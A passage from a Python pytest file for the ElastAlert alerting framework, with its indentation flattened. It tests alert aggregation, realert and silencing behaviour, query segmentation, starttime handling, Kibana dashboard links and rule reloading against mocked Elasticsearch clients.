# The calls should be spaced 1 hour apart
expected_calls = [ts_to_dt(start_time) + datetime.timedelta(hours=i) for i in range(1, 13)]
for e in expected_calls:
mock_gc.assert_any_call(e)
def run_rule_query_exception(ea, mock_es):
with mock.patch('elastalert.elastalert.elasticsearch_client') as mock_es_init:
mock_es_init.return_value = mock_es
ea.run_rule(ea.rules[0], END, START)
# Assert neither add_data nor garbage_collect were called
# and that starttime did not change
assert ea.rules[0].get('starttime') == START
assert ea.rules[0]['type'].add_data.call_count == 0
assert ea.rules[0]['type'].garbage_collect.call_count == 0
assert ea.rules[0]['type'].add_count_data.call_count == 0
def test_query_exception(ea):
mock_es = mock.Mock()
mock_es.search.side_effect = ElasticsearchException
run_rule_query_exception(ea, mock_es)
def test_query_exception_count_query(ea):
ea.rules[0]['use_count_query'] = True
ea.rules[0]['doc_type'] = 'blahblahblahblah'
mock_es = mock.Mock()
mock_es.count.side_effect = ElasticsearchException
run_rule_query_exception(ea, mock_es)
def test_match_with_module(ea):
mod = BaseEnhancement(ea.rules[0])
mod.process = mock.Mock()
ea.rules[0]['match_enhancements'] = [mod]
test_match(ea)
mod.process.assert_called_with({'@timestamp': END, 'num_hits': 0, 'num_matches': 1})
def test_match_with_module_from_pending(ea):
mod = BaseEnhancement(ea.rules[0])
mod.process = mock.Mock()
ea.rules[0]['match_enhancements'] = [mod]
ea.rules[0].pop('aggregation')
pending_alert = {'match_body': {'foo': 'bar'}, 'rule_name': ea.rules[0]['name'],
'alert_time': START_TIMESTAMP, '@timestamp': START_TIMESTAMP}
# First call, return the pending alert, second, no associated aggregated alerts
ea.writeback_es.search.side_effect = [{'hits': {'hits': [{'_id': 'ABCD', '_source': pending_alert}]}},
{'hits': {'hits': []}}]
ea.send_pending_alerts()
assert mod.process.call_count == 0
# If aggregation is set, enhancement IS called
pending_alert = {'match_body': {'foo': 'bar'}, 'rule_name': ea.rules[0]['name'],
'alert_time': START_TIMESTAMP, '@timestamp': START_TIMESTAMP}
ea.writeback_es.search.side_effect = [{'hits': {'hits': [{'_id': 'ABCD', '_source': pending_alert}]}},
{'hits': {'hits': []}}]
ea.rules[0]['aggregation'] = datetime.timedelta(minutes=10)
ea.send_pending_alerts()
assert mod.process.call_count == 1
def test_match_with_module_with_agg(ea):
mod = BaseEnhancement(ea.rules[0])
mod.process = mock.Mock()
ea.rules[0]['match_enhancements'] = [mod]
ea.rules[0]['aggregation'] = datetime.timedelta(minutes=15)
hits = generate_hits([START_TIMESTAMP, END_TIMESTAMP])
ea.current_es.search.return_value = hits
ea.rules[0]['type'].matches = [{'@timestamp': END}]
with mock.patch('elastalert.elastalert.elasticsearch_client'):
ea.run_rule(ea.rules[0], END, START)
assert mod.process.call_count == 0
def test_match_with_enhancements_first(ea):
mod = BaseEnhancement(ea.rules[0])
mod.process = mock.Mock()
ea.rules[0]['match_enhancements'] = [mod]
ea.rules[0]['aggregation'] = datetime.timedelta(minutes=15)
ea.rules[0]['run_enhancements_first'] = True
hits = generate_hits([START_TIMESTAMP, END_TIMESTAMP])
ea.current_es.search.return_value = hits
ea.rules[0]['type'].matches = [{'@timestamp': END}]
with mock.patch('elastalert.elastalert.elasticsearch_client'):
with mock.patch.object(ea, 'add_aggregated_alert') as add_alert:
ea.run_rule(ea.rules[0], END, START)
mod.process.assert_called_with({'@timestamp': END, 'num_hits': 0, 'num_matches': 1})
assert add_alert.call_count == 1
# Assert that dropmatchexception behaves properly
mod.process = mock.MagicMock(side_effect=DropMatchException)
ea.rules[0]['type'].matches = [{'@timestamp': END}]
with mock.patch('elastalert.elastalert.elasticsearch_client'):
with mock.patch.object(ea, 'add_aggregated_alert') as add_alert:
ea.run_rule(ea.rules[0], END, START)
mod.process.assert_called_with({'@timestamp': END, 'num_hits': 0, 'num_matches': 1})
assert add_alert.call_count == 0
def test_agg_matchtime(ea):
ea.max_aggregation = 1337
hits_timestamps = ['2014-09-26T12:34:45', '2014-09-26T12:40:45', '2014-09-26T12:47:45']
alerttime1 = dt_to_ts(ts_to_dt(hits_timestamps[0]) + datetime.timedelta(minutes=10))
hits = generate_hits(hits_timestamps)
ea.current_es.search.return_value = hits
with mock.patch('elastalert.elastalert.elasticsearch_client'):
# Aggregate first two, query over full range
ea.rules[0]['aggregate_by_match_time'] = True
ea.rules[0]['aggregation'] = datetime.timedelta(minutes=10)
ea.rules[0]['type'].matches = [{'@timestamp': h} for h in hits_timestamps]
ea.run_rule(ea.rules[0], END, START)
# Assert that the three matches were added to Elasticsearch
call1 = ea.writeback_es.index.call_args_list[0][1]['body']
call2 = ea.writeback_es.index.call_args_list[1][1]['body']
call3 = ea.writeback_es.index.call_args_list[2][1]['body']
assert call1['match_body']['@timestamp'] == '2014-09-26T12:34:45'
assert not call1['alert_sent']
assert 'aggregate_id' not in call1
assert call1['alert_time'] == alerttime1
assert call2['match_body']['@timestamp'] == '2014-09-26T12:40:45'
assert not call2['alert_sent']
assert call2['aggregate_id'] == 'ABCD'
assert call3['match_body']['@timestamp'] == '2014-09-26T12:47:45'
assert not call3['alert_sent']
assert 'aggregate_id' not in call3
# First call - Find all pending alerts (only entries without agg_id)
# Second call - Find matches with agg_id == 'ABCD'
# Third call - Find matches with agg_id == 'CDEF'
ea.writeback_es.search.side_effect = [{'hits': {'hits': [{'_id': 'ABCD', '_source': call1},
{'_id': 'CDEF', '_source': call3}]}},
{'hits': {'hits': [{'_id': 'BCDE', '_source': call2}]}},
{'hits': {'total': 0, 'hits': []}}]
with mock.patch('elastalert.elastalert.elasticsearch_client') as mock_es:
ea.send_pending_alerts()
# Assert that current_es was refreshed from the aggregate rules
assert mock_es.called_with(host='', port='')
assert mock_es.call_count == 2
assert_alerts(ea, [hits_timestamps[:2], hits_timestamps[2:]])
call1 = ea.writeback_es.search.call_args_list[7][1]['body']
call2 = ea.writeback_es.search.call_args_list[8][1]['body']
call3 = ea.writeback_es.search.call_args_list[9][1]['body']
call4 = ea.writeback_es.search.call_args_list[10][1]['body']
assert 'alert_time' in call2['filter']['range']
assert call3['query']['query_string']['query'] == 'aggregate_id:ABCD'
assert call4['query']['query_string']['query'] == 'aggregate_id:CDEF'
assert ea.writeback_es.search.call_args_list[9][1]['size'] == 1337
def test_agg_not_matchtime(ea):
ea.max_aggregation = 1337
hits_timestamps = ['2014-09-26T12:34:45', '2014-09-26T12:40:45', '2014-09-26T12:47:45']
match_time = ts_to_dt('2014-09-26T12:55:00Z')
hits = generate_hits(hits_timestamps)
ea.current_es.search.return_value = hits
with mock.patch('elastalert.elastalert.elasticsearch_client'):
with mock.patch('elastalert.elastalert.ts_now', return_value=match_time):
ea.rules[0]['aggregation'] = datetime.timedelta(minutes=10)
ea.rules[0]['type'].matches = [{'@timestamp': h} for h in hits_timestamps]
ea.run_rule(ea.rules[0], END, START)
# Assert that the three matches were added to Elasticsearch
call1 = ea.writeback_es.index.call_args_list[0][1]['body']
call2 = ea.writeback_es.index.call_args_list[1][1]['body']
call3 = ea.writeback_es.index.call_args_list[2][1]['body']
assert call1['match_body']['@timestamp'] == '2014-09-26T12:34:45'
assert not call1['alert_sent']
assert 'aggregate_id' not in call1
assert call1['alert_time'] == dt_to_ts(match_time + datetime.timedelta(minutes=10))
assert call2['match_body']['@timestamp'] == '2014-09-26T12:40:45'
assert not call2['alert_sent']
assert call2['aggregate_id'] == 'ABCD'
assert call3['match_body']['@timestamp'] == '2014-09-26T12:47:45'
assert not call3['alert_sent']
assert call3['aggregate_id'] == 'ABCD'
def test_agg_cron(ea):
ea.max_aggregation = 1337
hits_timestamps = ['2014-09-26T12:34:45', '2014-09-26T12:40:45', '2014-09-26T12:47:45']
hits = generate_hits(hits_timestamps)
ea.current_es.search.return_value = hits
alerttime1 = dt_to_ts(ts_to_dt('2014-09-26T12:46:00'))
alerttime2 = dt_to_ts(ts_to_dt('2014-09-26T13:04:00'))
with mock.patch('elastalert.elastalert.elasticsearch_client'):
with mock.patch('elastalert.elastalert.croniter.get_next') as mock_ts:
# Aggregate first two, query over full range
mock_ts.side_effect = [dt_to_unix(ts_to_dt('2014-09-26T12:46:00')), dt_to_unix(ts_to_dt('2014-09-26T13:04:00'))]
ea.rules[0]['aggregation'] = {'schedule': '*/5 * * * *'}
ea.rules[0]['type'].matches = [{'@timestamp': h} for h in hits_timestamps]
ea.run_rule(ea.rules[0], END, START)
# Assert that the three matches were added to Elasticsearch
call1 = ea.writeback_es.index.call_args_list[0][1]['body']
call2 = ea.writeback_es.index.call_args_list[1][1]['body']
call3 = ea.writeback_es.index.call_args_list[2][1]['body']
assert call1['match_body']['@timestamp'] == '2014-09-26T12:34:45'
assert not call1['alert_sent']
assert 'aggregate_id' not in call1
assert call1['alert_time'] == alerttime1
assert call2['match_body']['@timestamp'] == '2014-09-26T12:40:45'
assert not call2['alert_sent']
assert call2['aggregate_id'] == 'ABCD'
assert call3['match_body']['@timestamp'] == '2014-09-26T12:47:45'
assert call3['alert_time'] == alerttime2
assert not call3['alert_sent']
assert 'aggregate_id' not in call3
def test_agg_no_writeback_connectivity(ea):
""" Tests that if writeback_es throws an exception, the matches will be added to 'agg_matches' and when
run again, that they will be passed again to add_aggregated_alert """
hit1, hit2, hit3 = '2014-09-26T12:34:45', '2014-09-26T12:40:45', '2014-09-26T12:47:45'
hits = generate_hits([hit1, hit2, hit3])
ea.current_es.search.return_value = hits
ea.rules[0]['aggregation'] = datetime.timedelta(minutes=10)
ea.rules[0]['type'].matches = [{'@timestamp': hit1},
{'@timestamp': hit2},
{'@timestamp': hit3}]
ea.writeback_es.index.side_effect = elasticsearch.exceptions.ElasticsearchException('Nope')
with mock.patch('elastalert.elastalert.elasticsearch_client'):
with mock.patch.object(ea, 'find_pending_aggregate_alert', return_value=None):
ea.run_rule(ea.rules[0], END, START)
assert ea.rules[0]['agg_matches'] == [{'@timestamp': hit1, 'num_hits': 0, 'num_matches': 3},
{'@timestamp': hit2, 'num_hits': 0, 'num_matches': 3},
{'@timestamp': hit3, 'num_hits': 0, 'num_matches': 3}]
ea.current_es.search.return_value = {'hits': {'total': 0, 'hits': []}}
ea.add_aggregated_alert = mock.Mock()
with mock.patch('elastalert.elastalert.elasticsearch_client'):
ea.run_rule(ea.rules[0], END, START)
ea.add_aggregated_alert.assert_any_call({'@timestamp': hit1, 'num_hits': 0, 'num_matches': 3}, ea.rules[0])
ea.add_aggregated_alert.assert_any_call({'@timestamp': hit2, 'num_hits': 0, 'num_matches': 3}, ea.rules[0])
ea.add_aggregated_alert.assert_any_call({'@timestamp': hit3, 'num_hits': 0, 'num_matches': 3}, ea.rules[0])
def test_agg_with_aggregation_key(ea):
ea.max_aggregation = 1337
hits_timestamps = ['2014-09-26T12:34:45', '2014-09-26T12:40:45', '2014-09-26T12:43:45']
match_time = ts_to_dt('2014-09-26T12:45:00Z')
hits = generate_hits(hits_timestamps)
ea.current_es.search.return_value = hits
with mock.patch('elastalert.elastalert.elasticsearch_client'):
with mock.patch('elastalert.elastalert.ts_now', return_value=match_time):
ea.rules[0]['aggregation'] = datetime.timedelta(minutes=10)
ea.rules[0]['type'].matches = [{'@timestamp': h} for h in hits_timestamps]
# Hit1 and Hit3 should be aggregated together, since they have same query_key value
ea.rules[0]['type'].matches[0]['key'] = 'Key Value 1'
ea.rules[0]['type'].matches[1]['key'] = 'Key Value 2'
ea.rules[0]['type'].matches[2]['key'] = 'Key Value 1'
ea.rules[0]['aggregation_key'] = 'key'
ea.run_rule(ea.rules[0], END, START)
# Assert that the three matches were added to elasticsearch
call1 = ea.writeback_es.index.call_args_list[0][1]['body']
call2 = ea.writeback_es.index.call_args_list[1][1]['body']
call3 = ea.writeback_es.index.call_args_list[2][1]['body']
assert call1['match_body']['key'] == 'Key Value 1'
assert not call1['alert_sent']
assert 'aggregate_id' not in call1
assert 'aggregation_key' in call1
assert call1['aggregation_key'] == 'Key Value 1'
assert call1['alert_time'] == dt_to_ts(match_time + datetime.timedelta(minutes=10))
assert call2['match_body']['key'] == 'Key Value 2'
assert not call2['alert_sent']
assert 'aggregate_id' not in call2
assert 'aggregation_key' in call2
assert call2['aggregation_key'] == 'Key Value 2'
assert call2['alert_time'] == dt_to_ts(match_time + datetime.timedelta(minutes=10))
assert call3['match_body']['key'] == 'Key Value 1'
assert not call3['alert_sent']
# Call3 should have it's aggregate_id set to call1's _id
# It should also have the same alert_time as call1
assert call3['aggregate_id'] == 'ABCD'
assert 'aggregation_key' in call3
assert call3['aggregation_key'] == 'Key Value 1'
assert call3['alert_time'] == dt_to_ts(match_time + datetime.timedelta(minutes=10))
# First call - Find all pending alerts (only entries without agg_id)
# Second call - Find matches with agg_id == 'ABCD'
# Third call - Find matches with agg_id == 'CDEF'
ea.writeback_es.search.side_effect = [{'hits': {'hits': [{'_id': 'ABCD', '_source': call1},
{'_id': 'CDEF', '_source': call2}]}},
{'hits': {'hits': [{'_id': 'BCDE', '_source': call3}]}},
{'hits': {'total': 0, 'hits': []}}]
with mock.patch('elastalert.elastalert.elasticsearch_client') as mock_es:
ea.send_pending_alerts()
# Assert that current_es was refreshed from the aggregate rules
assert mock_es.called_with(host='', port='')
assert mock_es.call_count == 2
assert_alerts(ea, [[hits_timestamps[0], hits_timestamps[2]], [hits_timestamps[1]]])
call1 = ea.writeback_es.search.call_args_list[7][1]['body']
call2 = ea.writeback_es.search.call_args_list[8][1]['body']
call3 = ea.writeback_es.search.call_args_list[9][1]['body']
call4 = ea.writeback_es.search.call_args_list[10][1]['body']
assert 'alert_time' in call2['filter']['range']
assert call3['query']['query_string']['query'] == 'aggregate_id:ABCD'
assert call4['query']['query_string']['query'] == 'aggregate_id:CDEF'
assert ea.writeback_es.search.call_args_list[9][1]['size'] == 1337
def test_silence(ea):
# Silence test rule for 4 hours
ea.args.rule = 'test_rule.yaml' # Not a real name, just has to be set
ea.args.silence = 'hours=4'
ea.silence()
# Don't alert even with a match
match = [{'@timestamp': '2014-11-17T00:00:00'}]
ea.rules[0]['type'].matches = match
with mock.patch('elastalert.elastalert.elasticsearch_client'):
ea.run_rule(ea.rules[0], END, START)
assert ea.rules[0]['alert'][0].alert.call_count == 0
# Mock ts_now() to +5 hours, alert on match
match = [{'@timestamp': '2014-11-17T00:00:00'}]
ea.rules[0]['type'].matches = match
with mock.patch('elastalert.elastalert.ts_now') as mock_ts:
with mock.patch('elastalert.elastalert.elasticsearch_client'):
# Converted twice to add tzinfo
mock_ts.return_value = ts_to_dt(dt_to_ts(datetime.datetime.utcnow() + datetime.timedelta(hours=5)))
ea.run_rule(ea.rules[0], END, START)
assert ea.rules[0]['alert'][0].alert.call_count == 1
def test_compound_query_key(ea):
ea.rules[0]['query_key'] = 'this,that,those'
ea.rules[0]['compound_query_key'] = ['this', 'that', 'those']
hits = generate_hits([START_TIMESTAMP, END_TIMESTAMP], this='abc', that=u'☃', those=4)
ea.current_es.search.return_value = hits
ea.run_query(ea.rules[0], START, END)
call_args = ea.rules[0]['type'].add_data.call_args_list[0]
assert 'this,that,those' in call_args[0][0][0]
assert call_args[0][0][0]['this,that,those'] == u'abc, ☃, 4'
def test_silence_query_key(ea):
# Silence test rule for 4 hours
ea.args.rule = 'test_rule.yaml' # Not a real name, just has to be set
ea.args.silence = 'hours=4'
ea.silence('anytest.qlo')
# Don't alert even with a match
match = [{'@timestamp': '2014-11-17T00:00:00', 'username': 'qlo'}]
ea.rules[0]['type'].matches = match
ea.rules[0]['query_key'] = 'username'
with mock.patch('elastalert.elastalert.elasticsearch_client'):
ea.run_rule(ea.rules[0], END, START)
assert ea.rules[0]['alert'][0].alert.call_count == 0
# If there is a new record with a different value for the query_key, we should get an alert
match = [{'@timestamp': '2014-11-17T00:00:01', 'username': 'dpopes'}]
ea.rules[0]['type'].matches = match
with mock.patch('elastalert.elastalert.elasticsearch_client'):
ea.run_rule(ea.rules[0], END, START)
assert ea.rules[0]['alert'][0].alert.call_count == 1
# Mock ts_now() to +5 hours, alert on match
match = [{'@timestamp': '2014-11-17T00:00:00', 'username': 'qlo'}]
ea.rules[0]['type'].matches = match
with mock.patch('elastalert.elastalert.ts_now') as mock_ts:
with mock.patch('elastalert.elastalert.elasticsearch_client'):
# Converted twice to add tzinfo
mock_ts.return_value = ts_to_dt(dt_to_ts(datetime.datetime.utcnow() + datetime.timedelta(hours=5)))
ea.run_rule(ea.rules[0], END, START)
assert ea.rules[0]['alert'][0].alert.call_count == 2
def test_realert(ea):
hits = ['2014-09-26T12:35:%sZ' % (x) for x in range(60)]
matches = [{'@timestamp': x} for x in hits]
ea.current_es.search.return_value = hits
with mock.patch('elastalert.elastalert.elasticsearch_client'):
ea.rules[0]['realert'] = datetime.timedelta(seconds=50)
ea.rules[0]['type'].matches = matches
ea.run_rule(ea.rules[0], END, START)
assert ea.rules[0]['alert'][0].alert.call_count == 1
# Doesn't alert again
matches = [{'@timestamp': x} for x in hits]
with mock.patch('elastalert.elastalert.elasticsearch_client'):
ea.run_rule(ea.rules[0], END, START)
ea.rules[0]['type'].matches = matches
assert ea.rules[0]['alert'][0].alert.call_count == 1
# mock ts_now() to past the realert time
matches = [{'@timestamp': hits[0]}]
with mock.patch('elastalert.elastalert.ts_now') as mock_ts:
with mock.patch('elastalert.elastalert.elasticsearch_client'):
# mock_ts is converted twice to add tzinfo
mock_ts.return_value = ts_to_dt(dt_to_ts(datetime.datetime.utcnow() + datetime.timedelta(minutes=10)))
ea.rules[0]['type'].matches = matches
ea.run_rule(ea.rules[0], END, START)
assert ea.rules[0]['alert'][0].alert.call_count == 2
def test_realert_with_query_key(ea):
ea.rules[0]['query_key'] = 'username'
ea.rules[0]['realert'] = datetime.timedelta(minutes=10)
# Alert and silence username: qlo
match = [{'@timestamp': '2014-11-17T00:00:00', 'username': 'qlo'}]
ea.rules[0]['type'].matches = match
with mock.patch('elastalert.elastalert.elasticsearch_client'):
ea.run_rule(ea.rules[0], END, START)
assert ea.rules[0]['alert'][0].alert.call_count == 1
# Dont alert again for same username
match = [{'@timestamp': '2014-11-17T00:05:00', 'username': 'qlo'}]
ea.rules[0]['type'].matches = match
with mock.patch('elastalert.elastalert.elasticsearch_client'):
ea.run_rule(ea.rules[0], END, START)
assert ea.rules[0]['alert'][0].alert.call_count == 1
# Do alert with a different value
match = [{'@timestamp': '2014-11-17T00:05:00', 'username': ''}]
ea.rules[0]['type'].matches = match
with mock.patch('elastalert.elastalert.elasticsearch_client'):
ea.run_rule(ea.rules[0], END, START)
assert ea.rules[0]['alert'][0].alert.call_count == 2
# Alert with query_key missing
match = [{'@timestamp': '2014-11-17T00:05:00'}]
ea.rules[0]['type'].matches = match
with mock.patch('elastalert.elastalert.elasticsearch_client'):
ea.run_rule(ea.rules[0], END, START)
assert ea.rules[0]['alert'][0].alert.call_count == 3
# Still alert with a different value
match = [{'@timestamp': '2014-11-17T00:05:00', 'username': 'ghengis_khan'}]
ea.rules[0]['type'].matches = match
with mock.patch('elastalert.elastalert.elasticsearch_client'):
ea.run_rule(ea.rules[0], END, START)
assert ea.rules[0]['alert'][0].alert.call_count == 4
def test_realert_with_nested_query_key(ea):
ea.rules[0]['query_key'] = 'user.name'
ea.rules[0]['realert'] = datetime.timedelta(minutes=10)
# Alert and silence username: qlo
match = [{'@timestamp': '2014-11-17T00:00:00', 'user': {'name': 'qlo'}}]
ea.rules[0]['type'].matches = match
with mock.patch('elastalert.elastalert.elasticsearch_client'):
ea.run_rule(ea.rules[0], END, START)
assert ea.rules[0]['alert'][0].alert.call_count == 1
# Dont alert again for same username
match = [{'@timestamp': '2014-11-17T00:05:00', 'user': {'name': 'qlo'}}]
ea.rules[0]['type'].matches = match
with mock.patch('elastalert.elastalert.elasticsearch_client'):
ea.run_rule(ea.rules[0], END, START)
assert ea.rules[0]['alert'][0].alert.call_count == 1
def test_count(ea):
ea.rules[0]['use_count_query'] = True
ea.rules[0]['doc_type'] = 'doctype'
with mock.patch('elastalert.elastalert.elasticsearch_client'):
ea.run_rule(ea.rules[0], END, START)
# Assert that es.count is run against every run_every timeframe between START and END
start = START
query = {
'query': {'filtered': {'filter': {'bool': {'must': [{'range': {'@timestamp': {'lte': END_TIMESTAMP, 'gt': START_TIMESTAMP}}}]}}}}}
while END - start > ea.run_every:
end = start + ea.run_every
query['query']['filtered']['filter']['bool']['must'][0]['range']['@timestamp']['lte'] = dt_to_ts(end)
query['query']['filtered']['filter']['bool']['must'][0]['range']['@timestamp']['gt'] = dt_to_ts(start)
start = start + ea.run_every
ea.current_es.count.assert_any_call(body=query, doc_type='doctype', index='idx', ignore_unavailable=True)
def run_and_assert_segmented_queries(ea, start, end, segment_size):
with mock.patch.object(ea, 'run_query') as mock_run_query:
ea.run_rule(ea.rules[0], end, start)
original_end, original_start = end, start
for call_args in mock_run_query.call_args_list:
end = min(start + segment_size, original_end)
assert call_args[0][1:3] == (start, end)
start += segment_size
# Assert elastalert_status was created for the entire time range
assert ea.writeback_es.index.call_args_list[-1][1]['body']['starttime'] == dt_to_ts(original_start)
if ea.rules[0].get('aggregation_query_element'):
assert ea.writeback_es.index.call_args_list[-1][1]['body']['endtime'] == dt_to_ts(original_end - (original_end - end))
assert original_end - end < segment_size
else:
assert ea.writeback_es.index.call_args_list[-1][1]['body']['endtime'] == dt_to_ts(original_end)
def test_query_segmenting_reset_num_hits(ea):
# Tests that num_hits gets reset every time run_query is run
def assert_num_hits_reset():
assert ea.num_hits == 0
ea.num_hits += 10
with mock.patch.object(ea, 'run_query') as mock_run_query:
mock_run_query.side_effect = assert_num_hits_reset()
ea.run_rule(ea.rules[0], END, START)
assert mock_run_query.call_count > 1
def test_query_segmenting(ea):
# buffer_time segments with normal queries
ea.rules[0]['buffer_time'] = datetime.timedelta(minutes=53)
with mock.patch('elastalert.elastalert.elasticsearch_client'):
run_and_assert_segmented_queries(ea, START, END, ea.rules[0]['buffer_time'])
# run_every segments with count queries
ea.rules[0]['use_count_query'] = True
with mock.patch('elastalert.elastalert.elasticsearch_client'):
run_and_assert_segmented_queries(ea, START, END, ea.run_every)
# run_every segments with terms queries
ea.rules[0].pop('use_count_query')
ea.rules[0]['use_terms_query'] = True
with mock.patch('elastalert.elastalert.elasticsearch_client'):
run_and_assert_segmented_queries(ea, START, END, ea.run_every)
# buffer_time segments with terms queries
ea.rules[0].pop('use_terms_query')
ea.rules[0]['aggregation_query_element'] = {'term': 'term_val'}
with mock.patch('elastalert.elastalert.elasticsearch_client'):
ea.rules[0]['buffer_time'] = datetime.timedelta(minutes=30)
run_and_assert_segmented_queries(ea, START, END, ea.rules[0]['buffer_time'])
# partial segment size scenario
with mock.patch('elastalert.elastalert.elasticsearch_client'):
ea.rules[0]['buffer_time'] = datetime.timedelta(minutes=53)
run_and_assert_segmented_queries(ea, START, END, ea.rules[0]['buffer_time'])
# run every segmenting
ea.rules[0]['use_run_every_query_size'] = True
with mock.patch('elastalert.elastalert.elasticsearch_client'):
run_and_assert_segmented_queries(ea, START, END, ea.run_every)
def test_get_starttime(ea):
endtime = '2015-01-01T00:00:00Z'
mock_es = mock.Mock()
mock_es.search.return_value = {'hits': {'hits': [{'_source': {'endtime': endtime}}]}}
mock_es.info.return_value = {'version': {'number': '2.0'}}
ea.writeback_es = mock_es
# 4 days old, will return endtime
with mock.patch('elastalert.elastalert.ts_now') as mock_ts:
mock_ts.return_value = ts_to_dt('2015-01-05T00:00:00Z') # 4 days ahead of the endtime
assert ea.get_starttime(ea.rules[0]) == ts_to_dt(endtime)
# 10 days old, will return None
with mock.patch('elastalert.elastalert.ts_now') as mock_ts:
mock_ts.return_value = ts_to_dt('2015-01-11T00:00:00Z') # 10 days ahead of the endtime
assert ea.get_starttime(ea.rules[0]) is None
def test_set_starttime(ea):
# standard query, no starttime, no last run
end = ts_to_dt('2014-10-10T10:10:10')
with mock.patch.object(ea, 'get_starttime') as mock_gs:
mock_gs.return_value = None
ea.set_starttime(ea.rules[0], end)
assert mock_gs.call_count == 1
assert ea.rules[0]['starttime'] == end - ea.buffer_time
# Standard query, no starttime, rule specific buffer_time
ea.rules[0].pop('starttime')
ea.rules[0]['buffer_time'] = datetime.timedelta(minutes=37)
with mock.patch.object(ea, 'get_starttime') as mock_gs:
mock_gs.return_value = None
ea.set_starttime(ea.rules[0], end)
assert mock_gs.call_count == 1
assert ea.rules[0]['starttime'] == end - datetime.timedelta(minutes=37)
ea.rules[0].pop('buffer_time')
# Standard query, no starttime, last run
ea.rules[0].pop('starttime')
with mock.patch.object(ea, 'get_starttime') as mock_gs:
mock_gs.return_value = ts_to_dt('2014-10-10T00:00:00')
ea.set_starttime(ea.rules[0], end)
assert mock_gs.call_count == 1
assert ea.rules[0]['starttime'] == ts_to_dt('2014-10-10T00:00:00')
# Standard query, no starttime, last run, assure buffer_time doesn't go past
ea.rules[0].pop('starttime')
ea.rules[0]['buffer_time'] = datetime.timedelta(weeks=1000)
with mock.patch.object(ea, 'get_starttime') as mock_gs:
mock_gs.return_value = ts_to_dt('2014-10-09T00:00:00')
# First call sets minumum_time
ea.set_starttime(ea.rules[0], end)
# Second call uses buffer_time, but it goes past minimum
ea.set_starttime(ea.rules[0], end)
assert ea.rules[0]['starttime'] == ts_to_dt('2014-10-09T00:00:00')
# Standard query, starttime
ea.rules[0].pop('buffer_time')
ea.rules[0].pop('minimum_starttime')
with mock.patch.object(ea, 'get_starttime') as mock_gs:
mock_gs.return_value = None
ea.set_starttime(ea.rules[0], end)
assert mock_gs.call_count == 0
assert ea.rules[0]['starttime'] == end - ea.buffer_time
# Count query, starttime, no previous endtime
ea.rules[0]['use_count_query'] = True
ea.rules[0]['doc_type'] = 'blah'
with mock.patch.object(ea, 'get_starttime') as mock_gs:
mock_gs.return_value = None
ea.set_starttime(ea.rules[0], end)
assert mock_gs.call_count == 0
assert ea.rules[0]['starttime'] == end - ea.run_every
# Count query, with previous endtime
with mock.patch('elastalert.elastalert.elasticsearch_client'):
ea.run_rule(ea.rules[0], END, START)
ea.set_starttime(ea.rules[0], end)
assert ea.rules[0]['starttime'] == END
# buffer_time doesn't go past previous endtime
ea.rules[0].pop('use_count_query')
ea.rules[0]['previous_endtime'] = end - ea.buffer_time * 2
ea.set_starttime(ea.rules[0], end)
assert ea.rules[0]['starttime'] == ea.rules[0]['previous_endtime']
# Make sure starttime is updated if previous_endtime isn't used
ea.rules[0]['previous_endtime'] = end - ea.buffer_time / 2
ea.rules[0]['starttime'] = ts_to_dt('2014-10-09T00:00:01')
ea.set_starttime(ea.rules[0], end)
assert ea.rules[0]['starttime'] == end - ea.buffer_time
# scan_entire_timeframe
ea.rules[0].pop('previous_endtime')
ea.rules[0].pop('starttime')
ea.rules[0]['timeframe'] = datetime.timedelta(days=3)
ea.rules[0]['scan_entire_timeframe'] = True
with mock.patch.object(ea, 'get_starttime') as mock_gs:
mock_gs.return_value = None
ea.set_starttime(ea.rules[0], end)
assert ea.rules[0]['starttime'] == end - datetime.timedelta(days=3)
def test_kibana_dashboard(ea):
match = {'@timestamp': '2014-10-11T00:00:00'}
mock_es = mock.Mock()
ea.rules[0]['use_kibana_dashboard'] = 'my dashboard'
with mock.patch('elastalert.elastalert.elasticsearch_client') as mock_es_init:
mock_es_init.return_value = mock_es
# No dashboard found
mock_es.search.return_value = {'hits': {'total': 0, 'hits': []}}
with pytest.raises(EAException):
ea.use_kibana_link(ea.rules[0], match)
mock_call = mock_es.search.call_args_list[0][1]
assert mock_call['body'] == {'query': {'term': {'_id': 'my dashboard'}}}
# Dashboard found
mock_es.index.return_value = {'_id': 'ABCDEFG'}
mock_es.search.return_value = {'hits': {'hits': [{'_source': {'dashboard': json.dumps(dashboard_temp)}}]}}
url = ea.use_kibana_link(ea.rules[0], match)
assert 'ABCDEFG' in url
db = json.loads(mock_es.index.call_args_list[0][1]['body']['dashboard'])
assert 'anytest' in db['title']
# Query key filtering added
ea.rules[0]['query_key'] = 'foobar'
match['foobar'] = 'baz'
url = ea.use_kibana_link(ea.rules[0], match)
db = json.loads(mock_es.index.call_args_list[-1][1]['body']['dashboard'])
assert db['services']['filter']['list']['1']['field'] == 'foobar'
assert db['services']['filter']['list']['1']['query'] == '"baz"'
# Compound query key
ea.rules[0]['query_key'] = 'foo,bar'
ea.rules[0]['compound_query_key'] = ['foo', 'bar']
match['foo'] = 'cat'
match['bar'] = 'dog'
match['foo,bar'] = 'cat, dog'
url = ea.use_kibana_link(ea.rules[0], match)
db = json.loads(mock_es.index.call_args_list[-1][1]['body']['dashboard'])
found_filters = 0
for filter_id, filter_dict in db['services']['filter']['list'].items():
if (filter_dict['field'] == 'foo' and filter_dict['query'] == '"cat"') or \
(filter_dict['field'] == 'bar' and filter_dict['query'] == '"dog"'):
found_filters += 1
continue
assert found_filters == 2
def test_rule_changes(ea):
ea.rule_hashes = {'rules/rule1.yaml': 'ABC',
'rules/rule2.yaml': 'DEF'}
ea.rules = [ea.init_rule(rule, True) for rule in [{'rule_file': 'rules/rule1.yaml', 'name': 'rule1', 'filter': []},
{'rule_file': 'rules/rule2.yaml', 'name': 'rule2', 'filter': []}]]
ea.rules[1]['processed_hits'] = ['save me']
new_hashes = {'rules/rule1.yaml': 'ABC',
'rules/rule3.yaml': 'XXX',
'rules/rule2.yaml': '!@#$'}
with mock.patch('elastalert.elastalert.get_rule_hashes') as mock_hashes:
with mock.patch('elastalert.elastalert.load_configuration') as mock_load:
mock_load.side_effect = [{'filter': [], 'name': 'rule2', 'rule_file': 'rules/rule2.yaml'},
{'filter': [], 'name': 'rule3', 'rule_file': 'rules/rule3.yaml'}]
mock_hashes.return_value = new_hashes
ea.load_rule_changes()
# All 3 rules still exist
assert ea.rules[0]['name'] == 'rule1'
assert ea.rules[1]['name'] == 'rule2'
assert ea.rules[1]['processed_hits'] == ['save me']
assert ea.rules[2]['name'] == 'rule3'
# Assert 2 and 3 were reloaded
